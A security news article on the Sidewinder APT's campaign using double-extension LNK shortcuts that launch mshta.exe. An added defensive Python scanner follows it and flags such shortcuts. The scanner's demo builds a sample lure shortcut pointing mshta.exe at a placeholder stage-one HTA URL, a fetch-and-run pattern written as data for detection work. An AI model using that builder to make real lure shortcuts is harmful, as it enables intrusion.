Sidewinder Hackers Exploit LNK Files to Deploy Malicious Scripts
In a striking evolution of its tactics, the Sidewinder advanced persistent threat (APT) group—also known as APT-C-24 or “Rattlesnake”—has adopted a novel delivery mechanism leveraging Windows shortcut (LNK) files to orchestrate complex, multi-stage intrusions across South Asia.
Active since at least 2012 and targeting governments, energy utilities, military installations, and mining operations in Pakistan, Afghanistan, Nepal, Bhutan, and Myanmar, Sidewinder’s latest campaign exemplifies the group’s continued innovation in stealthy espionage operations.
Security researchers at the 360 Advanced Threat Research Institute uncovered a series of compressed archives containing three malicious LNK files each.

These archives, hosted on remote servers, employ carefully crafted filenames—such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk”—to masquerade as benign documents.
When a victim executes any of these shortcuts, the Windows mshta.exe binary is invoked to fetch and execute an obfuscated ...
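The lure described above combines two observable traits: a double extension such as “file 1.docx.lnk” and a shortcut whose target is mshta.exe. The following script is an added defensive example (not code from the article or from 360 Advanced Threat Research Institute) that parses the Shell Link header, LinkInfo local path and StringData of a .lnk file per the public MS-SHLLINK layout and flags both traits. The sample shortcuts, the builder that creates them and the `example.invalid` URL are constructed here for the demonstration and are not artifacts from the campaign.

```python
"""Flag .lnk files that use a document double extension or launch mshta.exe.
Added defensive example; the sample files below are constructed, not real."""
import struct
from pathlib import Path

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits from the MS-SHLLINK ShellLinkHeader
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

DOC_EXTENSIONS = (".docx", ".doc", ".pdf", ".xlsx", ".pptx")


def parse_lnk(data: bytes) -> dict:
    """Return the string fields of a Shell Link (local path, args, etc.)."""
    if len(data) < LNK_HEADER_SIZE or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    if struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("unexpected header size")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    offset, fields = LNK_HEADER_SIZE, {}
    if flags & HAS_LINK_TARGET_ID_LIST:            # IDListSize excludes itself
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                      # LinkInfoSize includes itself
        info_size, info_flags = struct.unpack_from("<I4xI", data, offset)
        if info_flags & 0x1:                       # VolumeIDAndLocalBasePath
            base_off = struct.unpack_from("<I", data, offset + 16)[0]
            start = offset + base_off
            end = data.index(b"\x00", start)
            fields["local_base_path"] = data[start:end].decode("cp1252", "replace")
        offset += info_size
    # StringData: length-prefixed strings in this fixed order, UTF-16 if IsUnicode
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[offset:offset + width * count]
        offset += width * count
        codec = "utf-16-le" if width == 2 else "cp1252"
        fields[name] = raw.decode(codec, "replace")
    return fields


def assess_shortcut(filename: str, data: bytes) -> list:
    """Return human-readable indicators; an empty list means nothing flagged."""
    findings = []
    lower = filename.lower()
    if lower.endswith(".lnk") and lower[:-4].endswith(DOC_EXTENSIONS):
        findings.append(f"double extension lure: {filename}")
    fields = parse_lnk(data)
    target_text = " ".join(fields.get(k, "") for k in
                           ("local_base_path", "relative_path", "working_dir",
                            "arguments")).lower()
    if "mshta" in target_text:
        findings.append("shortcut launches mshta.exe")
    if "http://" in target_text or "https://" in target_text:
        findings.append("shortcut passes a URL to its target")
    return findings


def build_sample_lnk(target: str, arguments: str) -> bytes:
    """Construct a minimal Shell Link for the demo (VolumeID body omitted)."""
    header = bytearray(LNK_HEADER_SIZE)
    struct.pack_into("<I", header, 0, LNK_HEADER_SIZE)
    header[4:20] = LNK_CLSID
    struct.pack_into("<I", header, 0x14, HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE)
    path = target.encode("cp1252") + b"\x00"
    info_size = 28 + len(path) + 1              # header + LocalBasePath + empty suffix
    link_info = struct.pack("<7I", info_size, 28, 0x1, 0, 28, 0, 28 + len(path))
    link_info += path + b"\x00"
    args = struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")
    return bytes(header) + link_info + args


# Constructed samples: one mimicking the lure pattern, one benign shortcut.
SAMPLE_FILES = {
    "file 1.docx.lnk": build_sample_lnk(r"C:\Windows\System32\mshta.exe",
                                        "http://example.invalid/stage1.hta"),
    "notes.lnk": build_sample_lnk(r"C:\Windows\System32\notepad.exe",
                                  r"C:\Users\Public\notes.txt"),
}


def scan_directory(root: str) -> dict:
    """Run assess_shortcut over every .lnk under root (e.g. an extracted archive)."""
    return {str(p): assess_shortcut(p.name, p.read_bytes())
            for p in Path(root).rglob("*.lnk")}


if __name__ == "__main__":
    for name, blob in SAMPLE_FILES.items():
        print(name, "->", assess_shortcut(name, blob) or "clean")
```

On a real host the same check belongs at the archive-extraction boundary or in an EDR rule keyed on explorer.exe spawning mshta.exe from a .lnk, since the shortcut's visible name is the only thing the victim sees before the download starts.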
Copyright of this story solely belongs to gbhackers.